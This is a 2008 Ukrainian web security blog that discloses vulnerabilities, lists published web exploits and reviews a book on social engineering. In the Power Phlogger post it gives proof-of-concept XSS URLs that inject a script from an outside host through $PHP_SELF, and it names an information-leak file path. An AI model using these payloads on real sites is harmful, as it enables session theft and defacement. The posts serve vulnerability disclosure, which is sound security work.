Websecurity - Веб безпека

11.02.2008

У липні, 11.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://shop.a.ua (пошук інтернет-магазинів порталу A.UA). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів A.UA я писав про уразливості на ref.a.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.06.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

В даній добірці експлоіти в веб додатках:

• eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability (деталі)
• eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability (деталі)
• XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability (деталі)
• PHPauction GPL Enhanced 2.51 Multiple RFI Vulnerabilities (деталі)
• Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities (деталі)
• Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win) (деталі)
• MG-SOFT Net Inspector 6.5.0.828 Multiple Remote Vulnerabilities (деталі)
• KAPhotoservice (album.asp) Remote SQL Injection Exploit (деталі)
• Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability (деталі)
• GCALDaemom DoS Expoit (деталі)

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 17.05.2008 та 31.05.2008, я виявив Denial of Service, Information Leakage та Cross-Site Scripting уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

DoS:

http://site/newaccount_self.php

Скрипт редиректить сам на себе (зациклений редирект). Mozilla автоматично зупиняє даний зациклений редирект (видає Redirect Loop Error), а IE - ні (продовжує звертатися до сервера). Якщо клієнт, що звертається до скрипта, сам не зупинить редирект, наприклад бот пошукових систем, то це спричинить велике навантаження на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

http://site/dspLogs.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/dspStats.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/edCss.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

Дані XSS можливі в зв’язку з використанням в скриптах $PHP_SELF.

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це шоста частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

В своїй презентації How to build the Web, Simon Willison розповідає про створення веб сайтів. Він розповідає про такі аспекти як сучасну клієнтську розробку, серверну розробку і веб фреймворки, та безпеку веб додатків.

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 5.01, Internet Explorer 6 та Internet Explorer 7 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server.

Можливий міжсайтовий скриптінг, підробка заголовків, витік інформації та виконання коду.

• CVE-2008-1544 (деталі)
• Microsoft Internet Explorer DOM Ojbect substringData() Heap Overflow Vulnerability (деталі)
• Microsoft Security Bulletin MS08-031 - Critical Cumulative Security Update for Internet Explorer (950759) (деталі)

В даній добірці уразливості в веб додатках:

• Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities (деталі)
• POWER PHLOGGER v.2.2.5 (username) SQL Injection (деталі)
• Flashbb <= 1.1.7 - Remote File Inclusion Exploit (деталі)
• Entertainment CMS Admin Login Bypass (деталі)
• SYSTONY’Cfr/portal/ actualites.asp sql injection (деталі)
• Infinity Solutions LLC e/description.asp sql injection (деталі)
• MERCURY/Templates mercury.ASP SQL Injection (деталі)
• Another You tube clone script vulnerability (деталі)
• CodeIgniter 1.5.3 vulnerabilities (деталі)
• Cross-Site Request Forgery (CSRF) vulnerability in Jportal 2.3.1 (деталі)

Пропоную вам ознайомитися з цікавою книгою Кевіна Мітника “Искусство обмана“. В своїй книзі “Мистецтво обману”, Кевін розповідає про соціальну інженерію, про те як він опанував дану професію (наводить деякі деталі своєї біографії) і про можливості її використання.

Лінку на дану книгу люб’язно надав Роман в своєму книжному огляді. До речі, в своєму пості Роман згадує про цікавий випадок, який з ним стався коли він вирішив придбати собі в онлайні книги. В результаті замовлення книг на сайті магазину аудиокниг, він на додачу до самого зомовлення, ще й виявив серйозну Information Leakage дірку (що приводила до витоку конфеденційних даних покупців магазину).

Як він зазначив, після того як він повідомив власникам сайта, дірку залатали швидко, а ось про спасибі забули. На жаль, це звичайна ситуація (для власників будь-яких сайтів). Про те, що власникі сайтів забувають казати спасибі за повідомлення про уразливості на їх сайтах, я знаю дуже добре: за 2006, 2007 та 2008 роки, що я займаюсь соціальним секюріті аудитом, з подібнім видношенням зіткався і зіткаюся дуже часто (я почав зіткатися з несерйозним відношенням починаючи ще з 2005 року, як почав займатися напрямком веб безпеки, і по сьогодні).

P.S.

Як я щойно глянув, за кілька секунд знайшовши три уразливості на сайті згаданого онлайн магазину (а дірок там може бути ще чимало), безпека даного магазину залишає бажати кращого .

18.07.2007

У липні, 08.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.einnews.com - пошуковцю та агрегатору новин. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

13.06.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

В даній добірці експлоіти в веб додатках:

• Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit (деталі)
• EasyGallery <= 5.0tr Multiple Remote Vulnerabilities (деталі)
• EasyCalendar <= 4.0tr Multiple Remote Vulnerabilities (деталі)
• AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit (деталі)
• eXV2 Module WebChat 1.60 (roomid) Remote SQL Injection Vulnerability (деталі)
• eXV2 Module Viso <= 2.0.4.3 (kid) Remote SQL Injection Vulnerability (деталі)
• fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability (деталі)
• phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability (деталі)
• Multiple Timesheets <= 5.0 Multiple Remote Vulnerabilities (деталі)
• Gelato SQL Injection exploit (деталі)

В травні минулого року була виявлена Cross-Site Scripting уразливість в stats плагіні для WordPress.

Це persistent XSS уразливість, яка мала місце в плагіні stats, що дозволяє мати статистику відвідувань від wordpress.com. Уразливим було поле referer в статистиці, що накопичує плагін. Дана уразливість вже виправлена.

• Persistent cross-site scripting in wordpress.com dashboard (деталі)